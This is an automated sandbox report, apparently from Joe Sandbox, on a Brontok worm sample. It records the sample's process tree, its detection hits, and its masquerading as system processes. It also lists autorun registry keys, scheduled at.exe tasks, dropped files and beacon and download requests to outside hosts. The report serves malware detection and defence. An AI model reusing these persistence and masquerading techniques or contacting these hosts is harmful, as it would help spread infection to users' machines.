Windows Analysis Report
Pedang @ P#U00ecsau.exe

Overview

General Information

Sample name: Pedang @ P#U00ecsau.exe (renamed because the original name is a hash value)
Original sample name: Pedang @ Psau.exe
Analysis ID: 1592395
MD5: 32798ad1498394ac5602e8801b00aadb
SHA1: d9720c040d947477392e68b92a0575b8d9d31609
SHA256: 1afb0258c432833baefe232e6f0c2015259f536670e2a8fe1cb6b191776c7864

Detection

Brontok
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Brontok
Changes the view of files in windows explorer (hidden files and folders)
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Disables the Windows registry editor (regedit)
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for available system drives (often done to infect USB drives)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Deletes files inside the Windows folder
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64_ra
  • Pedang @ P#U00ecsau.exe (PID: 6284 cmdline: "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe" MD5: 32798AD1498394AC5602E8801B00AADB)
    • explorer.exe (PID: 2744 cmdline: explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • smss.exe (PID: 6868 cmdline: C:\Users\user\AppData\Local\smss.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • winlogon.exe (PID: 6724 cmdline: C:\Users\user\AppData\Local\winlogon.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • at.exe (PID: 6984 cmdline: at /delete /y MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • at.exe (PID: 3900 cmdline: at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com" MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • at.exe (PID: 7160 cmdline: at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com" MD5: 2AE20048111861FA09B709D3CC551AD6)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • services.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\services.exe MD5: 32798AD1498394AC5602E8801B00AADB)
      • lsass.exe (PID: 4176 cmdline: C:\Users\user\AppData\Local\lsass.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • inetinfo.exe (PID: 676 cmdline: C:\Users\user\AppData\Local\inetinfo.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • svchost.exe (PID: 1276 cmdline: C:\Users\user\AppData\Local\svchost.exe MD5: 32798AD1498394AC5602E8801B00AADB)
        • cmd.exe (PID: 6272 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Source | Rule | Description | Author | Strings
Pedang @ P#U00ecsau.exe | INDICATOR_EXE_Packed_MEW | Detects executables packed with MEW | ditekSHen |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif | INDICATOR_EXE_Packed_MEW | Detects executables packed with MEW | ditekSHen |

Source | Rule | Description | Author | Strings
00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmp | INDICATOR_EXE_Packed_MEW | Detects executables packed with MEW | ditekSHen |
00000003.00000002.1247666976.0000000000401000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_Brontok | Yara detected Brontok | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetFilename: C:\Users\user\AppData\Local\smss.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Local\svchost.exe, CommandLine: C:\Users\user\AppData\Local\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Users\user\AppData\Local\svchost.exe, ProcessId: 1276, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Local\smss.exe, CommandLine: C:\Users\user\AppData\Local\smss.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\smss.exe, NewProcessName: C:\Users\user\AppData\Local\smss.exe, OriginalFileName: C:\Users\user\AppData\Local\smss.exe, ParentCommandLine: "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe", ParentImage: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ParentProcessId: 6284, ParentProcessName: Pedang @ P#U00ecsau.exe, ProcessCommandLine: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, ProcessName: smss.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Users\user\AppData\Local\winlogon.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Local\br5205on.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tok-Cirrhatus-2091
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\AppData\Local\smss.exe, ProcessId: 6868, TargetFilename: C:\Windows\SysWOW64\user's Setting.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\svchost.exe, CommandLine: C:\Users\user\AppData\Local\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Users\user\AppData\Local\svchost.exe, ProcessId: 1276, ProcessName: svchost.exe
Source: Process started | Author: Tim Rauch | Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\lsass.exe, ParentImage: C:\Users\user\AppData\Local\lsass.exe, ParentProcessId: 4176, ParentProcessName: lsass.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat, ProcessId: 6272, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: none, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe, ProcessId: 6284, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Bron-Spizaetus
Source: Process started | Author: vburov | Data: Command: C:\Users\user\AppData\Local\winlogon.exe, CommandLine: C:\Users\user\AppData\Local\winlogon.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\winlogon.exe, NewProcessName: C:\Users\user\AppData\Local\winlogon.exe, OriginalFileName: C:\Users\user\AppData\Local\winlogon.exe, ParentCommandLine: C:\Users\user\AppData\Local\smss.exe, ParentImage: C:\Users\user\AppData\Local\smss.exe, ParentProcessId: 6868, ParentProcessName: smss.exe, ProcessCommandLine: C:\Users\user\AppData\Local\winlogon.exe, ProcessId: 6724, ProcessName: winlogon.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-16T04:08:25.459364+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.16 | 49712 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-16T04:08:15.747206+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49707 | 72.14.178.174 | 80 | TCP
2025-01-16T04:08:16.268685+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49708 | 3.130.204.160 | 80 | TCP
2025-01-16T04:08:20.298872+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49710 | 103.6.117.2 | 80 | TCP
2025-01-16T04:08:25.453585+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49712 | 3.94.10.34 | 80 | TCP
2025-01-16T04:08:31.581924+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49713 | 104.21.48.1 | 80 | TCP
2025-01-16T04:08:33.368566+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49715 | 104.21.48.1 | 80 | TCP
2025-01-16T04:08:35.294924+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49715 | 104.21.48.1 | 80 | TCP


AV Detection

Source: http://www.fajarweb.com/? | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif | Avira: detection malicious, Label: TR/Brontok.Q
Source: Pedang @ P#U00ecsau.exe | ReversingLabs: Detection: 100%
Source: Pedang @ P#U00ecsau.exe | Virustotal: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif | Joe Sandbox ML: detected
Source: Pedang @ P#U00ecsau.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.70.191:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.6.117.3:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49716 version: TLS 1.2

Spreading

Source: Yara match | File source: 00000003.00000002.1247666976.0000000000401000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: z:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: y:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: x:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: w:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: v:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: u:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: t:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: s:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: r:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: q:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: p:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: o:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: n:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: m:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: l:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: k:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: j:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: i:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: h:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: g:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: f:
Source: C:\Users\user\AppData\Local\winlogon.exe | File opened: e:
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File opened: C:\Users\user\AppData

Networking

Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 172.67.70.191 443
Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 3.94.10.34 80
Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 72.14.178.174 80
Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 3.130.204.160 80
Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 103.6.117.2 80
Source: C:\Users\user\AppData\Local\svchost.exe | Network Connect: 103.6.117.3 443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49713 -> 104.21.48.1:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49710 -> 103.6.117.2:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49712 -> 3.94.10.34:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49708 -> 3.130.204.160:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49715 -> 104.21.48.1:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.16:49712
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49707 -> 72.14.178.174:80
Source: global traffic | HTTP traffic detected: GET /WS1/cgi/x.cgi?NAVG=Tracker&username=%64%65%6C%62%65%6C%62%72%6F HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.debuging.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /? HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.17tahun.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /? HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.kaskus.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /? HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.fajarweb.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /Kids/dbrotlu/Bron-IDUTSPLD.css HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.20mbweb.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /Kids/dbrotlu/IN18.css HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.20mbweb.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /Kids/dbrotlu/Host18.css HTTP/1.1 | User-Agent: Mozilla/5.0 (compatible; Opera/DXBLBO; Linux) | Host: www.20mbweb.com | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: google.com
Source: global traffic | DNS traffic detected: DNS query: www.debuging.com
Source: global traffic | DNS traffic detected: DNS query: www.17tahun.com
Source: global traffic | DNS traffic detected: DNS query: www.hugedomains.com
Source: global traffic | DNS traffic detected: DNS query: www.kaskus.com
Source: global traffic | DNS traffic detected: DNS query: www.kaskus.co.id
Source: global traffic | DNS traffic detected: DNS query: www.fajarweb.com
Source: global traffic | DNS traffic detected: DNS query: www.20mbweb.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | HTTPS traffic detected: 172.67.70.191:443 -> 192.168.2.16:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.6.117.3:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49716 version: TLS 1.2

System Summary

Source: Pedang @ P#U00ecsau.exe, type: SAMPLE | Matched rule: Detects executables packed with MEW Author: ditekSHen
Source: 00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects executables packed with MEW Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPED | Matched rule: Detects executables packed with MEW Author: ditekSHen
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Windows\SysWOW64\sistem.sys
Source: C:\Users\user\AppData\Local\inetinfo.exe | File created: C:\Windows\System32\drivers\etc\hosts-Denied By-user.com
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Windows\ShellNew\bbm-xoomnhfc.exe
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Windows\SysWOW64\cmd-bro-nmx.exe
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Windows\sembako-cfzjmnh.exe
Source: C:\Users\user\AppData\Local\smss.exe | File created: C:\Windows\SysWOW64\user's Setting.scr
Source: C:\Users\user\AppData\Local\smss.exe | File created: C:\Windows\SysWOW64\DXBLBO.exe
Source: C:\Users\user\AppData\Local\inetinfo.exe | File deleted: C:\Windows\System32\drivers\etc\hosts-Denied By-user.com
Source: Pedang @ P#U00ecsau.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Pedang @ P#U00ecsau.exe, type: SAMPLE | Matched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
Source: 00000000.00000000.1160595842.0000000000400000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Empty.pif, type: DROPPED | Matched rule: INDICATOR_EXE_Packed_MEW author = ditekSHen, description = Detects executables packed with MEW
Source: classification engine | Classification label: mal100.spre.evad.winEXE@29/18@9/24
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Users\user\AppData\Local\BronMesPedang @ P#U00ecsau.ini
Source: C:\Users\user\AppData\Local\svchost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_03
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File created: C:\Users\user\AppData\Local\Temp\~DF6EFAC80E34D11BD1.TMP
Source: C:\Users\user\AppData\Local\lsass.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Pedang @ P#U00ecsau.exe | ReversingLabs: Detection: 100%
Source: Pedang @ P#U00ecsau.exe | Virustotal: Detection: 95%
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | File read: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe
Source: unknown | Process created: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe "C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe"
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Process created: C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exe | Process created: C:\Users\user\AppData\Local\smss.exe C:\Users\user\AppData\Local\smss.exe
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Users\user\AppData\Local\winlogon.exe C:\Users\user\AppData\Local\winlogon.exe
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Windows\SysWOW64\at.exe at /delete /y
Source: C:\Windows\SysWOW64\at.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Windows\SysWOW64\at.exe at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
Source: C:\Windows\SysWOW64\at.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Windows\SysWOW64\at.exe at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Users\user\AppData\Local\services.exe C:\Users\user\AppData\Local\services.exe
Source: C:\Windows\SysWOW64\at.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\smss.exe | Process created: C:\Users\user\AppData\Local\lsass.exe C:\Users\user\AppData\Local\lsass.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at /delete /y
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 17:08 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Windows\SysWOW64\at.exe at 11:03 /every:M,T,W,Th,F,S,Su "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\8592-NendangBro.com"
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\services.exe C:\Users\user\AppData\Local\services.exe
                  Source: C:\Users\user\AppData\Local\smss.exeProcess created: C:\Users\user\AppData\Local\lsass.exe C:\Users\user\AppData\Local\lsass.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\inetinfo.exe C:\Users\user\AppData\Local\inetinfo.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\svchost.exe C:\Users\user\AppData\Local\svchost.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\inetinfo.exe C:\Users\user\AppData\Local\inetinfo.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Users\user\AppData\Local\svchost.exe C:\Users\user\AppData\Local\svchost.exe
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\lsass.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\BronNetDomList.bat
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: msvbvm60.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: vb6zz.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: wldp.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: profapi.dll
                  Source: C:\Users\user\Desktop\Pedang @ P#U00ecsau.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
